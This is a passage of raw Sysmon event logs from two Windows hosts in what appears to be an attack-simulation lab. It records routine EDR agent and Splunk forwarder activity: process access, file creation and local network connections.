10341000x800000000000000044942Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.766{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044941Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.760{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044940Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.714{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044939Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.711{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000044938Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.576{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=780684A806EC906F0A77ECEF785DFE93,SHA256=B5AF20F47E4F0D80A5BE5B8631AFB814A9DCF1F1A490E8644AA328B841A91148,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044937Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.545{FE4C2B44-E53B-63C7-6606-00000000AF02}66402368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017465Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:31.792{E5A8D418-E53B-63C7-1B02-00000000B002}3628408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017464Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:31.621{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E53B-63C7-1B02-00000000B002}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017463Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:31.621{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017462Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:31.621{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017461Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:31.621{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017460Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:31.621{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017459Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:31.621{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017458Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:31.621{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017457Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:31.621{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017456Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:31.621{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017455Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:31.621{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E53B-63C7-1B02-00000000B002}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017454Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:31.621{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017453Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:31.621{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E53B-63C7-1B02-00000000B002}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017452Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:31.621{E5A8D418-E53B-63C7-1B02-00000000B002}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000017451Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:30.032{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50137-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017450Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:31.086{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=B50ED2BAF437002228F448DC8CE2B1FA,SHA256=C68C42D78169C344A3AC13CC6162134E1C12ABAA32568F77E7DFFEDE2ACE93EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044936Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.373{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E53B-63C7-6606-00000000AF02}6640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044935Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.373{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044934Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.373{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044933Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.373{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044932Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.373{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044931Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.373{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E53B-63C7-6606-00000000AF02}6640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044930Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.373{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E53B-63C7-6606-00000000AF02}6640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044929Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.374{FE4C2B44-E53B-63C7-6606-00000000AF02}6640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program 